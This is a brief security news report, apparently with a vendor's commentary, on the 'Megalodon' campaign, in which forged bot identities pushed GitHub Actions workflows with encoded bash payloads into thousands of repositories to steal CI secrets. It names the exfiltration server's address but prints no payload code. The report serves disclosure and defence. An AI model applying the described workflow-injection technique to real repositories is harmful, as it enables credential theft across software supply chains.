Megalodon GitHub Attack Targets 5,561 Repos with Malicious CI/CD Workflows

Cybersecurity researchers have disclosed details of a new automated campaign called Megalodon that has pushed 5,718 malicious commits to 5,561 GitHub repositories within a six-hour window. "Using throwaway accounts and forged author identities (build-bot, auto-ci, ci-bot, pipeline-bot), the attacker injected GitHub Actions workflows containing base64-encoded bash payloads that exfiltrate CI

Researchers at SafeDep reported an automated campaign dubbed Megalodon that used compromised GitHub credentials and forged CI bot identities (e.g., build-bot, auto-ci, ci-bot, pipeline-bot) to push 5,718 malicious commits into 5,561 public repositories within roughly six hours.[1][2] The attacker modified GitHub Actions workflows to embed base64-encoded bash payloads (SysDiag and Optimize-Build variants) that executed in CI/CD pipelines and exfiltrated a wide range of secrets, including cloud credentials, SSH keys, OIDC tokens, and other sensitive environment data to attacker-controlled infrastructure at 216.126.225.129:8443.[1][2][4] From a CyberSE.AI perspective, this is a critical AI supply chain risk pattern: any AI or ML system that depends on these compromised repos or their CI artifacts could unknowingly incorporate tainted code or leaked credentials, undermining model integrity and operational security. Organizations should harden their software and AI supply chain by auditing GitHub Actions workflows, enforcing least-privilege tokens, rotating secrets, and establishing SBOM-driven provenance checks for all components feeding AI pipelines, which aligns with CyberSE.AI’s AI